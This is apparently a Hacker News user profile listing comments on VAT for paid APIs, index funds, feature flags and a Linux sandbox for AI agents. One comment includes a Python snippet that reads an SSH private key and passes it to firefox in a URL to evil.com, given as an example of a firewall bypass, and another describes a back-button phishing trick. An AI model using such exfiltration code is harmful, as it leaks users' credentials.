HackerTrans
TopNewTrendsCommentsPastAskShowJobs

mixedbit

no profile record

Submissions

/proc/self/exe overwrite from within a user namespace

mixedbit.org
4 points·by mixedbit·28 hari yang lalu·0 comments

Show HN: Sandbox agents without losing your dev environment

github.com
4 points·by mixedbit·3 bulan yang lalu·0 comments

Show HN: Drop – Linux sandboxing for LLM agents and untrusted code

github.com
1 points·by mixedbit·4 bulan yang lalu·0 comments

comments

mixedbit
·10 hari yang lalu·discuss
Normal vending machine transactions are B2C transactions, so the buyer cannot be a company - cannot pay with company money and cannot deduce the payment as the company cost. I guess, the buyer can take a receipt from a vending machine and ask the vending machine owner to provide a B2B invoice based on the receipt, to make this a proper B2B payment.

Can you treat your remote service access as B2C only? Perhaps yes, but then the companies will not be able to use your service, pay from a company bank account and account this as a company cost, only individuals will be able to legally pay.

Vending machine is also located in a known physical country, so the owner knows what VAT to apply, the VAT of the country the machine is in. With software services the VAT should be applied based on the country where the buyer is located.
mixedbit
·10 hari yang lalu·discuss
With payments the complexity is not only in accepting a payment, but largely in doing so legally. Someone makes a request to my company's paid service, I return 402 and get a stable coin back. Who do I invoice for this revenue? What value added tax do I apply to the invoice? If someone makes 10k paid requests within one month, do I have means of generating one invoice for them for all the usage, or is every request treated separately and results in 10k invoices? Will CloudFlare handle this for me?
mixedbit
·11 hari yang lalu·discuss
You are right, but if stock repurchase does not increase market cap, dividend payment still decreases it (unless it would be fully reinvested in the same stock, which it is not, it is largely reinvested in largest caps).
mixedbit
·12 hari yang lalu·discuss
Could outperformance of largest cap companies be partially explained by dividends paid by smaller caps? Reasoning behind this:

* Index investing raises in popularity, with index funds that automatically reinvest dividends being often preferred due to their tax efficiency.

* Large caps prefer to repurchase stocks, stock repurchases contribute fully towards a given company share price increase.

* Smaller caps still pay dividends, these dividends are then reinvested by index funds and the reinvestment is weighted by capitalization, so large caps share price benefits more from repurchases done with dividend cash paid by smaller caps. When dividend is paid, share price of a company that paid it is reduced, which further widens the performance gap between large and smaller caps.
mixedbit
·13 hari yang lalu·discuss
I work on a Linux sandbox that makes it easy to hide sensitive files from AI agents while keeping the files they need accessible. Check it out: https://github.com/wrr/drop
mixedbit
·29 hari yang lalu·discuss
Except for LLM services, which move away from subscriptions
mixedbit
·bulan lalu·discuss
I made a sandbox to productively work with agents while restricting files they can read and write: https://github.com/wrr/drop
mixedbit
·bulan lalu·discuss
one possibility is that some heavily indebted AI infrastructure company will be unable to meet its dept obligations, which will cause banks that become heavily exposed to AI-infrastructure related dept to tumble
mixedbit
·bulan lalu·discuss
sp500 has profitability requirement, I doubt LLM companies will show profits any time soon.
mixedbit
·2 bulan yang lalu·discuss
This is just an implementation detail, a feature flag can very well be implemented with a Boolean in a database.

To me the main appeal of feature flags is that they allow to work on large features that often require months and many commits to finish in a main branch. This, at least to me, results in a more lightweight and more iterative development process. This contrasts with maintaining a separate branch, with perhaps separate deployment target for a large in-development features.
mixedbit
·2 bulan yang lalu·discuss
When I was doing Fast.AI Deep Learning course, I was surprised by the number of Python dependencies machine learning projects bring. Web front-end projects were always considered very third-party dependencies heavy, but to me, the machine learning ecosystem looks much more entangled. In addition, unlike web development, which is considered security critical and has over the many years accumulated a lot of wisdom and good security-related practices, machine learning development looks much more ad-hoc, with many common software engineering practices not applied.

For example, at that time, one way to distribute machine learning models was via Python pickles. Which are executable objects with no restriction built in. Models in this format could do anything on a computer where the model was imported. Such an early 'wild-west' ecosystem can definitely make security compromises easier and resulting supply chain attacks more common.
mixedbit
·3 bulan yang lalu·discuss
An interesting variant of a web phishing attack is to combine the back button hijacking with information that comes from the HTTP referer header. HTTP referer discloses from which website the user is coming from, when the user click the back button, the malicious site can take the user to the site that looks identical (except for the URL), but is attacker controlled.
mixedbit
·3 bulan yang lalu·discuss
I'm working on a sandbox for Linux terminal work with UX similar to Python virtualenv: https://github.com/wrr/drop
mixedbit
·3 bulan yang lalu·discuss
Recently I was wondering how viable it is to launch a niche, paid tool for Linux. I found that this is a very rare model, most tools are either just free, supported by sponsorship, supported by some paid cloud-based service that accompanies the tool, use an open-core model with paid add-ons.

I wonder if the decision of Little Snitch to make the Linux version free forever was also informed by this "no way to make money selling tools on Linux" wisdom or if there was another motivation. It seems that if any tool has chances of making decent money on Linux, a product like Little Snitch, which is already well established, with working payment infrastructure would be a good candidate.
mixedbit
·3 bulan yang lalu·discuss
OK, I see, so a limitation is also that I cannot block an individual script, I need to block a Python interpreter.
mixedbit
·3 bulan yang lalu·discuss
I'm not a Little Snitch or Open Snitch user, I wonder if these firewalls are able to block requests done with the use of some other, allow-listed program.

Say I run a script `suspicious.py' and I deny this script from making any network requests. I also have firefox which is allowed to make any HTTPS requests. If suspicious.py does something like:

   key = (Path.home() / '.ssh' / 'id_rsa').read_text()
   subprocess.Popen(['firefox', f'https://evil.com/upload/{key}'])
will this request be blocked?
mixedbit
·3 bulan yang lalu·discuss
Check also https://github.com/wrr/drop which is a higher-level tool than bwrap. It allows you to make such isolated sandboxes with minimal configuration.
mixedbit
·3 bulan yang lalu·discuss
Is the OS implemented from scratch, or is it a stripped down version of some existing OS?
mixedbit
·3 bulan yang lalu·discuss
In Europe there have always been a good selection of affordable, entry-level vehicles, but recently these affordable choices have largely vanished. Toyota Corolla, the best-selling car in the world, is about 100% more expensive than pre-covid. Toyota Yaris, originally a small, city car, has gotten bigger, and more expensive. Basically, small, city car options are disappearing. Short-term, this is beneficial for car makers, because they sell more expensive options with larger margins, but it creates a large gap to fill. Chinese manufacturers make a multitude of models at very competitive prices and currently only taxes are keeping these models from dominating the markets. Long term, automakers must return to making affordable cars with smaller margins to survive.
mixedbit
·3 bulan yang lalu·discuss
I work on a sandboxing tool similarly based on an idea to point the user home dir to a separate location (https://github.com/wrr/drop). While I experimented with using overlayfs to isolate changes to the filesystem and it worked well as a proof-of-concept, overlayfs specification is quite restrictive regarding how it can be mounted to prevent undefined behaviors.

I wonder if and how jai managed to address these limitations of overlayfs. Basically, the same dir should not be mounted as an overlayfs upper layer by different overlayfs mounts. If you run 'jai bash' twice in different terminals, do the two instances get two different writable home dir overlays, or the same one? In the second case, is the second 'jai bash' command joining the mount namespace of the first one, or create a new one with the same shared upper dir?

This limitation of overlays is described here: https://docs.kernel.org/filesystems/overlayfs.html :

'Using an upper layer path and/or a workdir path that are already used by another overlay mount is not allowed and may fail with EBUSY. Using partially overlapping paths is not allowed and may fail with EBUSY. If files are accessed from two overlayfs mounts which share or overlap the upper layer and/or workdir path, the behavior of the overlay is undefined, though it will not result in a crash or deadlock.'